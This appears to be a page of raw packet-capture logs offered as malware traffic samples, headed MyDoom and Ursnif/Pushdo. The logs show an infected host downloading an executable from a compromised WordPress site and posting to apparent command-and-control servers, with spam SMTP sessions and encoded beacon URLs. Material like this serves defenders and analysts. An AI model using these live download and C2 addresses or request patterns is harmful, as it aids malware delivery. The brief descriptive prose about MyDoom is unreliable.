2019-07-25 13:00:42.104455 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [.], ack 327, win 64240, length 0
E..(6…..$.\5`.
..e.P…..=.]4.P…….
2019-07-25 13:00:42.113973 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [P.], seq 1:198, ack 233, win 64240, length 197: HTTP: HTTP/1.1 200 OK
E…6…….Mxs.
..e.P..
DrVQd..P… C..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

6

0

2019-07-25 13:00:42.114334 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [F.], seq 233, ack 198, win 64043, length 0
E..(.v@…..
..eMxs….PQd..
Ds.P..+u0..
2019-07-25 13:00:42.114462 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 234, win 64239, length 0
E..(6……|Mxs.
..e.P..
Ds.Qd..P…tl..
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j6…….\5`.
..e.P…..=.]4.P…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: application/octet-stream
Content-Length: 300032
Last-Modified: Thu, 25 Jul 2019 14:50:21 GMT
Connection: keep-alive
ETag: “5d39c1ad-49400”
Expires: Sun, 25 Aug 2019 17:00:35 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

2019-07-25 13:05:46.182168 IP 10.7.25.101.49179 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…P.o..6.i.P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.182269 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [.], ack 342, win 64240, length 0
E..(8$….w.^| 5
..e.P..6.i..o..P…8…
2019-07-25 13:05:46.184001 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [S.], seq 2287068635, ack 1286805230, win 64240, options [mss 1460], length 0
E..,8%….w.^| 5
..e.P…Q..L…`………..
2019-07-25 13:05:46.184189 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [.], ack 1, win 64240, length 0
E..(..@…n(
..e^| 5…PL….Q..P…….
2019-07-25 13:05:46.184358 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…PL….Q..P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.184449 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [.], ack 342, win 64240, length 0
E..(8&….w.^| 5
..e.P…Q..L..CP….5..
2019-07-25 13:05:46.211149 IP 83.220.175.185.80 > 10.7.25.101.49178: Flags [FP.], seq 198, ack 232, win 64239, length 0
E..(8’……S…
..e.P….p..Y.RP…….
2019-07-25 13:05:46.211404 IP 10.7.25.101.49178 > 83.220.175.185.80: Flags [.], ack 199, win 64043, length 0
E..(..@….A
..eS……P.Y.R..p.P..+….
2019-07-25 13:05:46.346765 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [P.], seq 1:1347, ack 342, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j8(….rI^| 5
..e.P..6.i..o..P…….HTTP/1.1 200 OK
Date: Thu, 25 Jul 2019 17:05:39 GMT
Server: Apache
Last-Modified: Tue, 23 Jul 2019 10:59:38 GMT
Accept-Ranges: bytes
Content-Length: 110592
Connection: close
Content-Type: application/x-msdownload

2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@…..
..eMxs….P..7.`.?-P…b9..POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&
2019-07-25 13:05:46.540724 IP 77.120.115.221.80 > 10.7.25.101.49182: Flags [.], ack 152, win 64240, length 0
E..(86……Mxs.
..e.P..`.?-..8.P….V..
2019-07-25 13:05:47.588118 IP 10.7.25.101.49184 > 31.44.184.33.80: Flags [P.], seq 1:201, ack 1, win 64240, length 200: HTTP: GET /H7mp HTTP/1.1
E…..@….{
..e.,.!. .P[^b0.#.jP…+…GET /H7mp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-25 13:05:47.588274 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [.], ack 201, win 64240, length 0
E..(8……..,.!
..e.P. .#.j[^b.P…s…
2019-07-25 13:05:47.646083 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [S.], seq 1514318061, ack 732422481, win 64240, options [mss 1460], length 0
E..,8……;S…
..e.P.!ZB..+..Q`………..
2019-07-25 13:05:47.646247 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..eS….!.P+..QZB..P….F..
2019-07-25 13:05:47.646312 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [P.], seq 1:151, ack 1, win 64240, length 150: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@….c
..eS….!.P+..QZB..P…6V..POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

d1=1000101001&
2019-07-25 13:05:47.646371 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [.], ack 151, win 64240, length 0
E..(8……>S…
..e.P.!ZB..+…P…….
2019-07-25 13:05:47.662936 IP 10.7.25.101.49186 > 31.44.184.33.80: Flags [S], seq 291674496, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….3
..e.,.!.”.P.b…….. ……………..
2019-07-25 13:05:47.758694 IP 77.120.115.221.80 > 10.7.25.101.49183: Flags [FP.], seq 187, ack 154, win 64239, length 0
E..(8……~Mxs.
..e.P……….P…….
2019-07-25 13:05:47.758957 IP 10.7.25.101.49183 > 77.120.115.221.80: Flags [.], ack 188, win 64054, length 0
E..(..@….7
..eMxs….P……..P..6.D..
2019-07-25 13:05:47.763295 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [P.], seq 1:122, ack 201, win 64240, length 121: HTTP: HTTP/1.1 200 OK
E…8……..,.!
..e.P. .#.j[^b.P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Thu, 25 Jul 2019 21:05:22 GMT
Content-Length: 210944

2019-07-25 13:05:48.827934 IP 10.7.25.101.49187 > 31.44.184.33.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367: HTTP: GET /visit.js HTTP/1.1
E….r@….5
..e.,.!.#.P….?t.5P….2..GET /visit.js HTTP/1.1
Accept: /
Cookie: D6CFR6fSx/2pSZ6OGAbt8JcWC6fjnf0iRH/lXdUuFoUeISeBOx4dHDkZGpLFCgSVAKGsc73GvXP0V+JT4J/NSi6vVSuEzjcFPy8q5lYtHAmcacE1cATGok6yawYmMTtyhx2I0swd+ECPu/GZEjnwuxElE6bQjaa4PTvKsU3FWt4=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

MyDoom DDoS $38 Billion Dollar P2P Malware Botnet PCAP Download Traffic Sample

MyDoom Botnet

MyDoom has several methods of impacts, but main attacks are DDOS
MyDoom uses DGA for its P2P communications but also some Command and Control Server

Damage of an estimated $38.7 billion was caused by the fastest spreading malware Mydoom to Microsoft Windows-based computers. Spyware is a deadly malware that extracts a company’s confidential information without awareness of the company.

2019-07-15 13:00:22.289866 IP 10.7.15.101.51171 > 10.7.15.1.53: 48767+ MX? acm.org. (25)
E..5……..
..e
……5.!X…………..acm.org…..
2019-07-15 13:00:22.340366 IP 10.7.15.1.53 > 10.7.15.101.51171: 48767 1/0/0 MX mail.mailroute.net. 10 (59)
E..W…….G

..e.5…C……………acm.org………………
.mail mailroute.net.
2019-07-15 13:00:22.348650 IP 10.7.15.101.53658 > 10.7.15.1.53: 65013+ A? mail.mailroute.net. (36)
E..@……..
..e
……5.,$_………….mail mailroute.net…..
2019-07-15 13:00:22.382026 IP 10.7.15.1.53 > 10.7.15.101.53658: 65013 2/0/0 A 199.89.1.120, A 199.89.3.120 (68)
E.........= ... ..e.5...L...............mail mailroute.net..................Y.x.............Y.x 2019-07-15 13:00:22.382637 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [S], seq 3423424506, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4..@..... ..e.Y.x......O....... ................. 2019-07-15 13:00:22.501570 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [S.], seq 2591540629, ack 3423424507, win 64240, options [mss 1460], length 0 E..,......O..Y.x ..e.....w....O.…~…….
2019-07-15 13:00:22.501779 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:22.824195 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [P.], seq 1:66, ack 1, win 64240, length 65: SMTP: 220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled
E..i……Ot.Y.x
..e…..w….O.P…5…220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled

2019-07-15 13:00:22.928682 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 66, win 64175, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:24.456432 IP 10.7.15.101.49164 > 157.130.29.226.1042: Flags [S], seq 824150712, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…%;
..e……..1……… ..I…………..
2019-07-15 13:00:24.924489 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….}
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:24.988231 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….{
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:25.049108 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….z
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:25.112279 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….y
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:25.174765 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=……..
..e
……5.)[u.G………..libreoffice.org…..
2019-07-15 13:00:25.237468 IP 10.7.15.101.50685 > 10.7.15.1.53: 56734+ MX? libreoffice.org. (33)
E..=…….~
..e
……5.)……………libreoffice.org…..
2019-07-15 13:00:25.939540 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….w
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:26.001128 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….u
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:26.062827 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….t
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:26.126226 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….s
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:26.187392 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=…….y
:
2019-07-15 13:00:30.460095 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 1:54, ack 1, win 64240, length 53: SMTP: 220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)
E..]…………
..e….]`.k…
P….h..220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:30.460605 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 1:15, ack 54, win 64187, length 14: SMTP: EHLO acm.org
E..6..@…..
..e………..
]`..P….T..EHLO acm.org

2019-07-15 13:00:30.460715 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 15, win 64240, length 0
E..(…………
..e….]......P....n.. 2019-07-15 13:00:30.541199 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [S.], seq 678655145, ack 2272612538, win 64240, options [mss 1460], length 0 E..,......y.Y.D. ..e....(st..uP.………..
2019-07-15 13:00:30.541436 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [.], ack 1, win 64240, length 0
E..(..@…A.
..eY.D……uP.(st.P….R..
2019-07-15 13:00:30.601674 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 54:197, ack 15, win 64240, length 143: SMTP: 250-gabe.freedesktop.org
E……….?….
..e….]`……P…%]..250-gabe.freedesktop.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:30.602630 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 15:43, ack 197, win 64044, length 28: SMTP: MAIL FROM:fdrake@acm.org
E..D..@…..
..e…………]`./P..,QQ..MAIL FROM:fdrake@acm.org

2019-07-15 13:00:30.602753 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 43, win 64240, length 0
E..(…………
..e….]./...4P....... 2019-07-15 13:00:30.735767 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 197:211, ack 43, win 64240, length 14: SMTP: 250 2.1.0 Ok E..6............ ..e....]./…4P…nf..250 2.1.0 Ok

2019-07-15 13:00:30.736105 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 43:88, ack 211, win 64030, length 45: SMTP: RCPT TO:libreoffice@lists.freedesktop.org
E..U..@…..
..e………..4]`.=P…….RCPT TO:libreoffice@lists.freedesktop.org

2019-07-15 13:00:30.736205 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 88, win 64240, length 0
E..(…………
..e….]`.=…aP…….
2019-07-15 13:00:31.087379 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 1:62, ack 1, win 64240, length 61: SMTP: 220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)
E..e……y.Y.D.
..e….(st..uP.P…….220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:31.087804 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 1:30, ack 62, win 64179, length 29: SMTP: EHLO global.libreoffice.org
E..E..@…A.
..eY.D……uP.(st.P….l..EHLO global.libreoffice.org

2019-07-15 13:00:31.087907 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 30, win 64240, length 0
E..(……y.Y.D.
..e….(st..uP.P…….
2019-07-15 13:00:31.270207 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 62:203, ack 30, win 64240, length 141: SMTP: 250-vm194.documentfoundation.org
E………y9Y.D.
..e….(st..uP.P…….250-vm194.documentfoundation.org
250-PIPELINING
250-SIZE 41943040
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:31.271261 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 30:77, ack 203, win 64038, length 47: SMTP: MAIL FROM:postmaster@global.libreoffice.org
E..W..@…A.
..eY.D……uP.(sutP..&….MAIL FROM:postmaster@global.libreoffice.org

2019-07-15 13:00:31.271380 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 77, win 64240, length 0
E..(……y.Y.D.
..e….(sut.uQ.P….<.. 2019-07-15 13:00:31.481963 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 203:217, ack 77, win 64240, length 14: SMTP: 250 2.1.0 Ok
E..6……y.Y.D.
..e….(sut.uQ.P…s…250 2.1.0 Ok

2019-07-15 13:00:31.482279 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 77:121, ack 217, win 64024, length 44: SMTP: RCPT TO:marketing@global.libreoffice.org
E..T..@…A.
..eY.D……uQ.(su.P….2..RCPT TO:marketing@global.libreoffice.org

2019-07-15 13:00:31.482382 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 121, win 64240, length 0
E..(……y.Y.D.
..e….(su..uQ2P…….
2019-07-15 13:00:31.686040 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 217:291, ack 121, win 64240, length 74: SMTP: 450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
E..r……yxY.D.
..e….(su..uQ2P….e..450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
2019-07-15 13:01:10.499434 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15417, win 64240, length 0
E..(……48.F(g
..e…;….D…P…]…
2019-07-15 13:01:10.499471 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15417:15490, ack 277, win 63964, length 73: SMTP: CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P
E..q.*@….C
..e.F(g.;..D…….P…….CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P

2019-07-15 13:01:10.499509 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15490, win 64240, length 0
E..(……47.F(g
..e…;….D..5P…]z..
2019-07-15 13:01:10.499581 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15490:15568, ack 277, win 63964, length 78: SMTP: E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9
E..v.+@….=
..e.F(g.;..D..5….P…FB..E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9

2019-07-15 13:01:10.499614 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15568, win 64240, length 0
E..(……46.F(g
..e…;….D…P…],..
2019-07-15 13:01:10.499657 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15568:15646, ack 277, win 63964, length 78: SMTP: VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo
E..v.,@….<
..e.F(g.;..D…….P….*..VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo

2019-07-15 13:01:10.499691 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15646, win 64240, length 0
E..(……45.F(g
..e…;….D…P……
2019-07-15 13:01:10.499734 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15646:15724, ack 277, win 63964, length 78: SMTP: ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb
E..v.-@….;
..e.F(g.;..D…….P….O..ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb

2019-07-15 13:01:10.499767 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15724, win 64240, length 0
E..(……44.F(g
..e…;….D…P……
2019-07-15 13:01:10.499810 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15724:15803, ack 277, win 63964, length 79: SMTP: 2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D
E..w..@….9
..e.F(g.;..D…….P…l…2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D

2019-07-15 13:01:10.499843 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15803, win 64240, length 0
E..(……43.F(g
..e…;….D..nP…\A..
2019-07-15 13:01:10.499885 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15803:15852, ack 277, win 63964, length 49: SMTP: Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY
E..Y./@….V
..e.F(g.;..D..n….P…….Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY

2019-07-15 13:01:10.499919 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15852, win 64240, length 0
E..(……42.F(g
..e…;….D…P……
2019-07-15 13:01:10.499962 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15852:15874, ack 277, win 63964, length 22: SMTP: WwwouqTVQl4axZk+9NR8
E..>.0@….p
..e.F(g.;..D…….P….s..WwwouqTVQl4axZk+9NR8

2019-07-15 13:01:10.499995 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15874, win 64240, length 0
E..(……41.F(g
..e…;….D…P…[…
2019-07-15 13:01:10.500037 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15874:15886, ack 277, win 63964, length 12: SMTP: fFly N+umw
E..4.1@….y
..e.F(g.;..D…….P…….fFly N+umw

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
E….]@…C,
..e…q….r.Z…..P………..p…l..]=…A..}}.5T+…M%…$…Lr*,.6…./.5…
….. .
.2.8…….+…………..riuytessl.xyz.
…………..
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
E..(…….t…q
..e……..r.Z.P…EP..
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382
E…………..q
..e……..r.Z.P………..]…Y..]?#Ny.8…..-…. i………!a.. .BAB…..i.PQ.?Qa&..K….’.6z…………………………………i0..e0..M……..y@.TCg.,..Xc.oo
.0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…190719142342Z..191017142342Z0.1.0…U….riuytessl.xyz0..”0.. .H………….0.. ……….(C.9.U.k…..j.C.U.6..|a….k…M.. …...”q….O..q..V.g4.k.i….:?….(……………….+G..I.u..]k..3…..<….au..].L’xLh…..#9q.r.k……?.fCib..4[}P……p……Y.U..y.:..i……p..Zt5s}. .z]A@azl.t..D..X….dVU..Rcp.o.l!..^,.1.1…q…….Mn.. ..Vl..5…….U0S’.y?…….>hr…7…..=.. .k!TS_n.UE#N……F.dvi…ws….Q….#\PT.06…..+1.Y.g.?W.o-…#%,[..U….P.7….DMe…….|e.Z..-0….F9H….j./…Zj.]… VJ…~.ayy..Ny;h.u.i.’.{U3$c…………&.5c|……6……9. …..X.)py.………….u0..q0…U………..0…U.%..0…+………+…….0…U…….0.0…U……:.$’.UF.W.x.*.h&….0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0+..U…$0″..riuytessl.xyz..www.riuytessl.xyz0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..l ..c…..G0E.!…..T..X.LB……..~Z.…V….. .+/.|Ri.e….5.…vO..w../.]….v.) 10.7.29.101.49158: Flags [.], seq 1383:2843, ack 118, win 64240, length 1460
E…………..q
..e…….xr.Z.P…….r……EG.x…l
..>…..G0E.!…..lh…..F…P…….w..<.l0… T<..y..T.2Q +..Q.p…3_>.#%.z!.E0.. *.H………….Q.>=-J..’p.!.7W……X..q.WTx…..i8<...kc6…….D.O…….3…>…i.RRx.5<.….]../..1.T..A f..&..4.Q…:.6j.NR…./x.9….J…5Me..V}h..e….=.G….{………d.O….3E.?.VG..e0……1…..$…?.bp..Gw…h..).., mZ3…….!;.X…Q/..d…y…|…f….o…0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..
………Z..G.r]7..hc0..5&.%…5.p./..KA….5.X...h….u….bq.y........xgq.i........B…tg…..Ra..?e…….V…..?…….k…}.+.e…6u.k.J…Ix/..O* %)..t..1..18….3.C….0..y1.=-6….3j.91……d.3…)…..}……….}0..y0…U…….0…….0…U………..0…+……..s0q02..+…..0..&http://isrg.trustid.ocsp.identrust.com0;..+…..0../http://apps.identrust.com/roots/dstrootcax3.p7c0…U.#..0…….{,q…K.u…`…0T..U. .M0K0…g…..0?..+……….000…+……..”http://cps.root-x1.letsencrypt.org0<..U…50301./.-.+http://crl.identrust.com/DSTROOTCAX3CRL.crl0…U…….Jjc.}….9..Ee…..0.. .H…………..3…cX8…. U.vV.pH.iG'{.$…Z.J.)7$tQ.bh…pg….N(Q………Z……j.j.>W#….b…….?. H….eb..T… ………2…w..ye.+.(.:.R..R.._….3.wl.@.2…\A.tl[]

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
E….*@…..
..e(L… .P.YQ.8.+9P…7F..GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
E..(……Aw(L..
..e.P. 8.+9.YS.P…….
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
E..l……@2(L..
..e.P. 8.+9.YS.P…….HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
E…..@…
}
